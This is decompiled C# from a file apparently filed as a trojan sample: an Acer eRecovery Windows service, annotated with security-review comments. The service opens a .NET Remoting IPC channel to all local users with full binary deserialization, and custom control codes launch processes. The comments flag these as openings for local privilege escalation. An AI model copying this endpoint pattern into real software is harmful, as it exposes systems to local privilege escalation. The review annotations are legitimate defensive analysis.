MalwareSourceCode/MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-d8d6de6a708417645ef396f90e846eda5ae240e20dd2ceba0b7c9c1e4a6a7d77/Service1.cs

// Decompiled with JetBrains decompiler
// Type: eRecoveryService.Service1
// Assembly: eRecoveryService, Version=2.5.3.6, Culture=neutral, PublicKeyToken=null
// MVID: 08DF666A-8C92-4CCB-869A-390134BB6787
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-d8d6de6a708417645ef396f90e846eda5ae240e20dd2ceba0b7c9c1e4a6a7d77.exe
using IERYETF;
using Microsoft.Win32;
using ServiceInterface;
using System;
using System.Collections;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Ipc;
using System.Runtime.Serialization.Formatters;
using System.Security.Principal;
using System.ServiceProcess;
using System.Timers;
namespace eRecoveryService
{
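/// <summary>
/// Windows service host for the eRecovery components. It publishes two
/// .NET Remoting objects over a local IPC channel, runs a one-time check for
/// the hidden recovery partition shortly after start, and maps two custom
/// service-control codes to <c>ImpersonateUser</c> process launchers.
/// </summary>
/// <remarks>
/// NOTE(review): this listing is decompiled output from a sample filed as
/// Trojan.Win32.Patched. Nothing in this class alone identifies the patched
/// code; ServerClass, ETFclass, ImpersonateUser and WIN32 are defined
/// elsewhere and need to be reviewed separately.
/// </remarks>
public class Service1 : ServiceBase
{
    // Install directory used when HKLM\Software\acer\eRecovery has no InstallPath value.
    private const string DefaultInstallDirectory = "C:\\Acer\\Empowering Technology\\eRecovery";

    private ServerClass eRServer;
    private ETFclass ETFServer;
    private IpcChannel channel;
    private Timer aTimer;
    private IContainer components;

    /// <summary>
    /// Creates the two remoted server objects and builds (but does not yet
    /// register) the IPC channel that exposes them.
    /// </summary>
    public Service1()
    {
        this.InitializeComponent();
        this.eRServer = new ServerClass();
        this.ETFServer = new ETFclass();

        // Publish both objects under fixed URIs on whatever channel is registered later.
        RemotingServices.Marshal((MarshalByRefObject) this.eRServer, "ServerObj", typeof (Interface));
        SecurityIdentifier usersSid = new SecurityIdentifier(WellKnownSidType.BuiltinUsersSid, (SecurityIdentifier) null);
        RemotingServices.Marshal((MarshalByRefObject) this.ETFServer, "ETFServerObj", typeof (IERY));

        IDictionary properties = (IDictionary) new Hashtable();
        properties[(object) "name"] = (object) "ipcEr";
        properties[(object) "portName"] = (object) "ipcErServer";

        // SECURITY(review): authorizedGroup is the built-in Users group, so every
        // interactive local account may connect to the "ipcErServer" pipe.
        properties[(object) "authorizedGroup"] = (object) usersSid.Translate(typeof (NTAccount)).ToString();

        // SECURITY(review): TypeFilterLevel.Full lifts the remoting deserialization
        // type filter for the binary formatter. Combined with the Users-wide
        // authorizedGroup above, any local user can submit serialized object graphs
        // to this service process. Left unchanged here because the callers'
        // requirements are not visible; prefer TypeFilterLevel.Low and a narrower
        // authorizedGroup if the Interface/IERY contracts allow it. For detection,
        // the pipe name "ipcErServer" and the URIs "ServerObj"/"ETFServerObj" are
        // the stable identifiers of this endpoint.
        BinaryServerFormatterSinkProvider serverSinkProvider = new BinaryServerFormatterSinkProvider();
        serverSinkProvider.TypeFilterLevel = TypeFilterLevel.Full;
        BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider();

        this.channel = new IpcChannel(properties, (IClientChannelSinkProvider) clientSinkProvider, (IServerChannelSinkProvider) serverSinkProvider);
    }

    /// <summary>
    /// Reads the eRecovery install directory from
    /// HKLM\Software\acer\eRecovery\InstallPath, falling back to
    /// <see cref="DefaultInstallDirectory"/> when the key or value is missing.
    /// </summary>
    /// <returns>The install directory as stored, without a trailing file name.</returns>
    private static string GetInstallDirectory()
    {
        // The key is opened read-only and disposed so the handle is not leaked
        // on every call; the value is read once instead of twice.
        using (RegistryKey key = Registry.LocalMachine.OpenSubKey("Software\\acer\\eRecovery", false))
        {
            object installPath = key == null ? null : key.GetValue("InstallPath");
            return installPath == null ? DefaultInstallDirectory : installPath.ToString();
        }
    }

    /// <summary>
    /// Timer callback armed by <see cref="OnStart"/>. Removes eRecovery when the
    /// hidden partition is absent, otherwise starts "mbrwrwin.exe reinstall"
    /// from the install directory, then disables the timer.
    /// </summary>
    private void OnTimedEvent(object source, ElapsedEventArgs e)
    {
        if (!ImpersonateUser.IsHiddenPartitionExist())
        {
            ImpersonateUser.DeleteeRecovery();
        }
        else
        {
            // CreateProcess is called with a null application name, so the
            // executable is parsed out of the command line. The default install
            // directory contains a space; without quotes Windows tries each
            // space-delimited prefix as a program name before the intended one,
            // so the executable path is quoted here.
            string lpCommandLine = "\"" + GetInstallDirectory() + "\\mbrwrwin.exe\" reinstall";

            WIN32.PROCESS_INFORMATION lpProcessInformation = new WIN32.PROCESS_INFORMATION();
            WIN32.STARTUPINFO lpStartupInfo = new WIN32.STARTUPINFO();
            WIN32.SECURITY_ATTRIBUTES lpProcessAttributes = new WIN32.SECURITY_ATTRIBUTES();
            WIN32.SECURITY_ATTRIBUTES lpThreadAttributes = new WIN32.SECURITY_ATTRIBUTES();
            lpProcessAttributes.nLength = Marshal.SizeOf((object) lpProcessAttributes);
            lpThreadAttributes.nLength = Marshal.SizeOf((object) lpThreadAttributes);

            // NOTE(review): the result of CreateProcess is ignored and the handles
            // returned in lpProcessInformation are not closed in this method; the
            // WIN32 wrapper is declared elsewhere, so confirm whether it handles that.
            // The child is started with the service's own token (no impersonation here).
            WIN32.CreateProcess((string) null, lpCommandLine, ref lpProcessAttributes, ref lpThreadAttributes, false, 0U, IntPtr.Zero, (string) null, ref lpStartupInfo, out lpProcessInformation);
        }

        // The check is meant to run once per service start.
        this.aTimer.Enabled = false;
    }

    /// <summary>
    /// Consumes the "FirstRestoreBoot.ini" marker in the install directory.
    /// </summary>
    /// <returns>
    /// <c>true</c> when the marker existed and was deleted; <c>false</c> when it was absent.
    /// </returns>
    private bool FirstRestortBoot()
    {
        string markerPath = GetInstallDirectory() + "\\FirstRestoreBoot.ini";
        if (!File.Exists(markerPath))
        {
            return false;
        }

        File.Delete(markerPath);
        return true;
    }

    /// <summary>
    /// Refreshes volume information, (re)registers the IPC channel and arms a
    /// 2-second timer that triggers <see cref="OnTimedEvent"/>.
    /// </summary>
    protected override void OnStart(string[] args)
    {
        this.eRServer.GetSystemVolumnInfo();

        // Drop any channel already registered under this name before registering ours.
        IChannel registered = ChannelServices.GetChannel("ipcErServer");
        if (registered != null)
        {
            ChannelServices.UnregisterChannel(registered);
        }

        if (this.channel != null)
        {
            // Second argument is ensureSecurity: the channel is registered with security enabled.
            ChannelServices.RegisterChannel((IChannel) this.channel, true);
        }

        this.aTimer = new Timer();
        this.aTimer.Elapsed += new ElapsedEventHandler(this.OnTimedEvent);
        this.aTimer.Interval = 2000.0;
        this.aTimer.Enabled = true;
    }

    /// <summary>
    /// Unregisters the IPC channel, if one was created.
    /// </summary>
    protected override void OnStop()
    {
        if (this.channel == null)
        {
            return;
        }

        ChannelServices.UnregisterChannel((IChannel) this.channel);
    }

    /// <summary>
    /// Handles user-defined service-control codes: 187 and 188 each invoke an
    /// <c>ImpersonateUser</c> process launcher; every code is then passed to the base class.
    /// </summary>
    /// <remarks>
    /// NOTE(review): what the launchers start, and under which identity, is not
    /// visible here. Whoever is allowed to send user-defined controls to this
    /// service can trigger them, so the service's security descriptor is part
    /// of the review surface.
    /// </remarks>
    protected override void OnCustomCommand(int command)
    {
        if (command == 187)
        {
            ImpersonateUser.ImpersonateUserToCreateProcessSilent();
        }
        else if (command == 188)
        {
            ImpersonateUser.ImpersonateUserToCreateProcess();
        }

        base.OnCustomCommand(command);
    }

    /// <summary>
    /// Releases the designer component container on managed disposal, then
    /// defers to the base implementation.
    /// </summary>
    protected override void Dispose(bool disposing)
    {
        if (disposing && this.components != null)
        {
            this.components.Dispose();
        }

        base.Dispose(disposing);
    }

    /// <summary>
    /// Designer initialisation: creates the component container and sets the service name.
    /// </summary>
    private void InitializeComponent()
    {
        this.components = (IContainer) new Container();
        this.ServiceName = nameof (Service1);
    }
}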
}